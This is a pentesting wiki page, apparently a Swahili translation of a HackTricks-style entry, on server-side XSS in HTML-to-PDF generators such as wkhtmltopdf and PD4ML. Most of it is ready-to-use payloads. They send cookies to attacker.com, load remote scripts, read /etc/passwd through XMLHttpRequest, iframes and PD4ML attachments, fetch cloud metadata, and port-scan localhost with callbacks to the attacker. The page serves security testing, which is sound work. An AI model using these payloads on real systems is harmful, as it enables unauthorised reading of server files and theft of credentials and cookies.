Server Side XSS (Dynamic PDF)

Reading time: 7 minutes

Server Side XSS (Dynamic PDF)

Ikiwa ukurasa wa wavuti unaunda PDF kwa kutumia pembejeo zinazodhibitiwa na mtumiaji, unaweza kujaribu kudanganya bot inayounda PDF ili kutekeleza msimbo wa JS wa kiholela.
Hivyo, ikiwa bot ya kuunda PDF inapata aina fulani ya HTML tags, itakuwa inafasiri hizo, na unaweza kutumia tabia hii kusababisha Server XSS.

Tafadhali, zingatia kwamba vitambulisho vya <script></script> havifanyi kazi kila wakati, hivyo utahitaji njia tofauti ya kutekeleza JS (kwa mfano, kutumia <img ).
Pia, kumbuka kwamba katika unyakuzi wa kawaida utaweza kuona/kushusha pdf iliyoundwa, hivyo utaweza kuona kila kitu unachokiandika kupitia JS (ukitumia document.write() kwa mfano). Lakini, ikiwa huwezi kuona PDF iliyoundwa, huenda ukahitaji kuchota taarifa kwa kufanya ombi la wavuti kwako (Blind).

Uundaji wa PDF maarufu

• wkhtmltopdf inajulikana kwa uwezo wake wa kubadilisha HTML na CSS kuwa hati za PDF, ikitumia injini ya uwasilishaji ya WebKit. Chombo hiki kinapatikana kama zana ya amri ya chanzo wazi, na kufanya iweze kupatikana kwa matumizi mbalimbali.
• TCPDF inatoa suluhisho thabiti ndani ya mfumo wa PHP kwa uundaji wa PDF. Ina uwezo wa kushughulikia picha, grafiki, na usimbuaji, ikionyesha uwezo wake wa kuunda hati ngumu.
• Kwa wale wanaofanya kazi katika mazingira ya Node.js, PDFKit inatoa chaguo linalofaa. Inaruhusu uundaji wa hati za PDF moja kwa moja kutoka HTML na CSS, ikitoa daraja kati ya maudhui ya wavuti na fomati zinazoweza kuchapishwa.
• Wataalamu wa Java wanaweza kupendelea iText, maktaba ambayo si tu inarahisisha uundaji wa PDF bali pia inasaidia vipengele vya juu kama saini za dijitali na kujaza fomu. Seti yake kamili ya vipengele inafanya iweze kutumika kwa kuunda hati salama na za mwingiliano.
• FPDF ni maktaba nyingine ya PHP, inayojulikana kwa urahisi na urahisi wa matumizi. Imeundwa kwa waendelezaji wanaotafuta njia rahisi ya uundaji wa PDF, bila haja ya vipengele vya kina.

Payloads

Discovery

<!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>

<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">

SVG

Miongoni mwa payloads zilizotangulia au zinazofuata zinaweza kutumika ndani ya payload hii ya SVG. Iframe moja inayofikia subdomain ya Burpcollab na nyingine inayofikia kiungo cha metadata zimewekwa kama mifano.

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>


<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(1);
// ]]>
</script>
</svg>

Unaweza kupata payloads nyingine nyingi za SVG katika https://github.com/allanlw/svg-cheatsheet

Ufunuo wa njia

<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>

Load an external script

Njia bora ya kutumia udhaifu huu ni kutumia udhaifu huo kufanya bot ipakue script unayodhibiti kwa ndani. Kisha, utaweza kubadilisha payload kwa ndani na kufanya bot ipakue hiyo kwa kutumia msimbo sawa kila wakati.

<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>

Soma faili la ndani / SSRF

<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>

<script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
</script>

<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
<embed src="file:///etc/passwd>" width="400" height="400">
<style><iframe src="file:///etc/passwd">
<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />

Kuchelewesha bot

<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
let time = 500;
setInterval(()=>{
let img = document.createElement("img");
img.src = `https://attacker.com/ping?time=${time}ms`;
time += 500;
}, 500);
</script>
<img src="https://attacker.com/delay">

Skanningi ya Bandari

<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
img.src = `http://attacker.com/ping?port=${port}`;
});
}

for(let i=0; i<1000; i++) {
checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">

SSRF

Uthibitisho huu unaweza kubadilishwa kwa urahisi kuwa SSRF (kama unaweza kufanya script ipakue rasilimali za nje). Hivyo jaribu tu kuutumia (kusoma metadata?).

Attachments: PD4ML

Kuna injini kadhaa za HTML 2 PDF ambazo zinaruhusu kuelezea viambatisho kwa PDF, kama PD4ML. Unaweza kutumia kipengele hiki kuambatisha faili yoyote ya ndani kwenye PDF.
Ili kufungua kiambatisho nilifungua faili hiyo kwa Firefox na kubonyeza mara mbili alama ya Paperclip ili kuhifadhi kiambatisho kama faili mpya.
Kuchukua jibu la PDF na burp pia kitaonyesha kiambatisho kwa maandiko wazi ndani ya PDF.

<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
<html>
<pd4ml:attachment
src="/etc/passwd"
description="attachment sample"
icon="Paperclip" />
</html>

Marejeo

• https://lbherrera.github.io/lab/h1415-ctf-writeup.html
• https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/
• https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html
• https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c